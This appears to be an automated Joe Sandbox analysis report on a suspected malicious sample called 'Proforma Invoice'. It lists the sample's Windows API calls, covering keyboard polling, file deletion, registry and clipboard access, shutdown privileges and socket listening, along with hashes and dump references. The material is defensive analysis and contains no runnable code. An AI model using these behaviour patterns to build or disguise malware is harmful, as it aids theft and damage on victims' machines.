                                                                                                • Instruction Fuzzy Hash: EF026A756006119FCB54EF24D841E2AB7E6FF89310F14895CF88A9B3A2DB38ED41CB95
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0Dt$0Et$0Ft$3ck$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGt$_k
                                                                                                • API String ID: 0-1130193868
                                                                                                • Opcode ID: 378fd752b12946d2de39ffa07b5961b9d1cc1221310323aa01f5ed2611328c85
                                                                                                • Instruction ID: c6e098c1b91ace52f6893a056065f388b2c2f11899060193d2064b119708fb8d
                                                                                                • Opcode Fuzzy Hash: 378fd752b12946d2de39ffa07b5961b9d1cc1221310323aa01f5ed2611328c85
                                                                                                • Instruction Fuzzy Hash: 6A725EB5E00219DBDB24CF59C8807FEB7B6FF45350F14816AE909EB291DB749A81CB90
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0070F113
                                                                                                • _wcscmp.LIBCMT ref: 0070F128
                                                                                                • _wcscmp.LIBCMT ref: 0070F13F
                                                                                                  • Part of subcall function 00704385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007043A0
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0070F16E
                                                                                                • FindClose.KERNEL32(00000000), ref: 0070F179
                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0070F195
                                                                                                • _wcscmp.LIBCMT ref: 0070F1BC
                                                                                                • _wcscmp.LIBCMT ref: 0070F1D3
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0070F1E5
                                                                                                • SetCurrentDirectoryW.KERNEL32(00758920), ref: 0070F203
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0070F20D
                                                                                                • FindClose.KERNEL32(00000000), ref: 0070F21A
                                                                                                • FindClose.KERNEL32(00000000), ref: 0070F22C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                • String ID: *.*
                                                                                                • API String ID: 1824444939-438819550
                                                                                                • Opcode ID: 69174bfaf46c1c0fc6aed357875101078d8700703a1a81b8e42477ddea6d1999
                                                                                                • Instruction ID: 5c79326147686d004095e80f4f8b5d27104933331539a45582461fd8c0941514
                                                                                                • Opcode Fuzzy Hash: 69174bfaf46c1c0fc6aed357875101078d8700703a1a81b8e42477ddea6d1999
                                                                                                • Instruction Fuzzy Hash: 1131CE76500219FACB30ABA4EC49EEE77FCAF45360F144279E800E25E1DB38DE45CA58
                                                                                                APIs
                                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0070A20F
                                                                                                • __swprintf.LIBCMT ref: 0070A231
                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0070A26E
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0070A293
                                                                                                • _memset.LIBCMT ref: 0070A2B2
                                                                                                • _wcsncpy.LIBCMT ref: 0070A2EE
                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0070A323
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0070A32E
                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0070A337
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0070A341
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                • String ID: :$\$\??\%s
                                                                                                • API String ID: 2733774712-3457252023
                                                                                                • Opcode ID: b19a0cd8f75d1f8af9fd443e38ddcf3af599fdd3eb0e787a5d3df09a02116342
                                                                                                • Instruction ID: b032b48aa6a8eecda04e64028b7c265147ab0e7bb79f4fd6f0de63fd4ee21660
                                                                                                • Opcode Fuzzy Hash: b19a0cd8f75d1f8af9fd443e38ddcf3af599fdd3eb0e787a5d3df09a02116342
                                                                                                • Instruction Fuzzy Hash: E131C5B1900209BBDB20DFA0DC45FEB77BDEF89740F1041BAF508D6190EB7496458B29
                                                                                                APIs
                                                                                                • GetKeyboardState.USER32(?), ref: 00700097
                                                                                                • SetKeyboardState.USER32(?), ref: 00700102
                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00700122
                                                                                                • GetKeyState.USER32(000000A0), ref: 00700139
                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00700168
                                                                                                • GetKeyState.USER32(000000A1), ref: 00700179
                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 007001A5
                                                                                                • GetKeyState.USER32(00000011), ref: 007001B3
                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 007001DC
                                                                                                • GetKeyState.USER32(00000012), ref: 007001EA
                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00700213
                                                                                                • GetKeyState.USER32(0000005B), ref: 00700221
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: State$Async$Keyboard
                                                                                                • String ID:
                                                                                                • API String ID: 541375521-0
                                                                                                • Opcode ID: 413809b73dfe5a5766d8c2e392c537e7b883b625466dea45bc9a33da8997fefc
                                                                                                • Instruction ID: 3c0686fde8a147d7db05ad7db4f7a2d9ef522bb53b3cda597d62ecb94858834b
                                                                                                • Opcode Fuzzy Hash: 413809b73dfe5a5766d8c2e392c537e7b883b625466dea45bc9a33da8997fefc
                                                                                                • Instruction Fuzzy Hash: 7E51CC30904788A9FB35DBA088547EABFF49F02390F48479ED5C5565C2DAAC9B8CC7E1
                                                                                                APIs
                                                                                                  • Part of subcall function 00720E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0071FDAD,?,?), ref: 00720E31
                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007204AC
                                                                                                  • Part of subcall function 006A9837: __itow.LIBCMT ref: 006A9862
                                                                                                  • Part of subcall function 006A9837: __swprintf.LIBCMT ref: 006A98AC
                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0072054B
                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007205E3
                                                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00720822
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0072082F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1240663315-0
                                                                                                • Opcode ID: f0fe56b50e853bc39bb7c166f25542c19549df49a88ce1db4c5de84f50cde2df
                                                                                                • Instruction ID: c7c9a5ee8ec5e19553a4b31369a9e84bbb543474b884b338d92ca43bbd468ccf
                                                                                                • Opcode Fuzzy Hash: f0fe56b50e853bc39bb7c166f25542c19549df49a88ce1db4c5de84f50cde2df
                                                                                                • Instruction Fuzzy Hash: 84E15C70204214AFCB54DF24D895E6BBBE5EF89714F04896DF84ADB262DA34ED01CBA1
                                                                                                APIs
                                                                                                  • Part of subcall function 006A9837: __itow.LIBCMT ref: 006A9862
                                                                                                  • Part of subcall function 006A9837: __swprintf.LIBCMT ref: 006A98AC
                                                                                                • CoInitialize.OLE32 ref: 00718403
                                                                                                • CoUninitialize.OLE32 ref: 0071840E
                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00732BEC,?), ref: 0071846E
                                                                                                • IIDFromString.OLE32(?,?), ref: 007184E1
                                                                                                • VariantInit.OLEAUT32(?), ref: 0071857B
                                                                                                • VariantClear.OLEAUT32(?), ref: 007185DC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                • API String ID: 834269672-1287834457
                                                                                                • Opcode ID: c74ed9dfd2d2ec5447bb95c8260e6d51e90580ac311341b9b0780e4a570d4662
                                                                                                • Instruction ID: de70cea3f42998201bf1dcd92b6e4514cc7398b74595834e329055a9bb3156d3
                                                                                                • Opcode Fuzzy Hash: c74ed9dfd2d2ec5447bb95c8260e6d51e90580ac311341b9b0780e4a570d4662
                                                                                                • Instruction Fuzzy Hash: 5F61BD706083129FD790DF58C848BAAB7E9EF49714F14441DF9819B291CB78ED88CBA3
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                • String ID:
                                                                                                • API String ID: 1737998785-0
                                                                                                • Opcode ID: 6603ee1c80320e4918ccc09b2813d3a500867f7da460b26b62ec9a0cf7fcc889
                                                                                                • Instruction ID: 10bfcf6d1933f65df085ed1d97242e461a59916b8c8e0d8dc07cdb8bbbaa2157
                                                                                                • Opcode Fuzzy Hash: 6603ee1c80320e4918ccc09b2813d3a500867f7da460b26b62ec9a0cf7fcc889
                                                                                                • Instruction Fuzzy Hash: F6218175200214AFDB20AF64EC19B6E7BB9FF05711F14C02AF946DB2A1DB78AC41CB58
                                                                                                APIs
                                                                                                  • Part of subcall function 006A4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A4743,?,?,006A37AE,?), ref: 006A4770
                                                                                                  • Part of subcall function 00704A31: GetFileAttributesW.KERNEL32(?,0070370B), ref: 00704A32
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 007038A3
                                                                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0070394B
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0070395E
                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0070397B
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0070399D
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007039B9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                • String ID: \*.*
                                                                                                • API String ID: 4002782344-1173974218
                                                                                                • Opcode ID: 6ed1a60910f7c8413b74ce979945044144b7b40f96747ab5123e9d1364db2f5d
                                                                                                • Instruction ID: 3da4d4fe7626299cd0fab1ce56a6fd2c53f3a972a6d0eb3b93f6068bb4115d3d
                                                                                                • Opcode Fuzzy Hash: 6ed1a60910f7c8413b74ce979945044144b7b40f96747ab5123e9d1364db2f5d
                                                                                                • Instruction Fuzzy Hash: A5519F3180414CDACF15FBA0CE929EDB7BAAF16300F604169E406761D2EF256F09CF65
                                                                                                APIs
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0070F440
                                                                                                • Sleep.KERNEL32(0000000A), ref: 0070F470
                                                                                                • _wcscmp.LIBCMT ref: 0070F484
                                                                                                • _wcscmp.LIBCMT ref: 0070F49F
                                                                                                • FindNextFileW.KERNEL32(?,?), ref: 0070F53D
                                                                                                • FindClose.KERNEL32(00000000), ref: 0070F553
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                • String ID: *.*
                                                                                                • API String ID: 713712311-438819550
                                                                                                • Opcode ID: b325d6d4cb5613c50bb25524e641854ce9c062e4e63ca082c849e226292193a9
                                                                                                • Instruction ID: cb2eebd85273bfb344bd291cde197aa15829199e3c55435bb547ddf644a9039f
                                                                                                • Opcode Fuzzy Hash: b325d6d4cb5613c50bb25524e641854ce9c062e4e63ca082c849e226292193a9
                                                                                                • Instruction Fuzzy Hash: A1416B7190021ADFCF60EF64DC49AEEBBB5FF05310F10456AE815A2291DB34AE55CF54
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __itow__swprintf
                                                                                                • String ID: 3ck$_k
                                                                                                • API String ID: 674341424-2131593748
                                                                                                • Opcode ID: 389a20894cec3edb3685baffe532e570e75d5ea3259d1a2eb71c3544ff6cea4d
                                                                                                • Instruction ID: 6e9a77ca101a32201e56ae62a47806844ea9668505afdf1bdc1c351d8281942d
                                                                                                • Opcode Fuzzy Hash: 389a20894cec3edb3685baffe532e570e75d5ea3259d1a2eb71c3544ff6cea4d
                                                                                                • Instruction Fuzzy Hash: 77229BB16083509FC764EF24C881BAAB7E6AF85300F10492CF48A97391DB31EE45CB96
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID:
                                                                                                • API String ID: 4104443479-0
                                                                                                • Opcode ID: d82d5c64e150bee6d50d963a314440776b74e0fb8db14689942eebe865c03ffc
                                                                                                • Instruction ID: ab047827f845cf619823cacfeb98d9441f811fca34cbd1555d0eb14422b2765a
                                                                                                • Opcode Fuzzy Hash: d82d5c64e150bee6d50d963a314440776b74e0fb8db14689942eebe865c03ffc
                                                                                                • Instruction Fuzzy Hash: A01278B0A00609DFDF04EFA5D981AEEB7B6FF48300F104569E806E7251EB36AD55CB54
                                                                                                APIs
                                                                                                  • Part of subcall function 006A4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A4743,?,?,006A37AE,?), ref: 006A4770
                                                                                                  • Part of subcall function 00704A31: GetFileAttributesW.KERNEL32(?,0070370B), ref: 00704A32
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00703B89
                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00703BD9
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00703BEA
                                                                                                • FindClose.KERNEL32(00000000), ref: 00703C01
                                                                                                • FindClose.KERNEL32(00000000), ref: 00703C0A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                • String ID: \*.*
                                                                                                • API String ID: 2649000838-1173974218
                                                                                                • Opcode ID: 35425401396a585b5692ff2c990f3fc5ea27fb4c126472b1754e09f3b76cadb6
                                                                                                • Instruction ID: b1689fef34c76f388db23e8a1187531a6441f24a58d2fb1ab86f5118789e3f43
                                                                                                • Opcode Fuzzy Hash: 35425401396a585b5692ff2c990f3fc5ea27fb4c126472b1754e09f3b76cadb6
                                                                                                • Instruction Fuzzy Hash: 57315C710083859BC245FB24C8919AFB7EDAE92314F404E2EF49596192EB259E09CB6B
                                                                                                APIs
                                                                                                  • Part of subcall function 006F87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006F882B
                                                                                                  • Part of subcall function 006F87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006F8858
                                                                                                  • Part of subcall function 006F87E1: GetLastError.KERNEL32 ref: 006F8865
                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 007051F9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                                • API String ID: 2234035333-194228
                                                                                                • Opcode ID: ecbfe28208df72b8011256b5767ca6a6c1eae6a551ccd307cc76d7ed8a7b65d7
                                                                                                • Instruction ID: def95d36eb0353d72da6fcac1a98a612ba48da19301a8d6956741d9573f47a0b
                                                                                                • Opcode Fuzzy Hash: ecbfe28208df72b8011256b5767ca6a6c1eae6a551ccd307cc76d7ed8a7b65d7
                                                                                                • Instruction Fuzzy Hash: 3B01F2B5691615EBE7386268AC8AFBB72E8FF05740F200734F913E20D2DA591C018A94
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharUpper
                                                                                                • String ID: pbv$%s
                                                                                                • API String ID: 3964851224-2483896684
                                                                                                • Opcode ID: 0c460ebfa182a6c32b9b828ab0ab17b54d9cd78ee7ab42b2cdf14a5a7e3bd770
                                                                                                • Instruction ID: 1d77426dd574e6585df1185706291b9348f7de90b40b80b8ab203b078103b16d
                                                                                                • Opcode Fuzzy Hash: 0c460ebfa182a6c32b9b828ab0ab17b54d9cd78ee7ab42b2cdf14a5a7e3bd770
                                                                                                • Instruction Fuzzy Hash: A9925CB05083419FD720DF24C480BABBBE6BF85304F14896DE58A9B352DB75EC85CB96
                                                                                                APIs
                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007162DC
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 007162EB
                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00716307
                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00716316
                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00716330
                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00716344
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
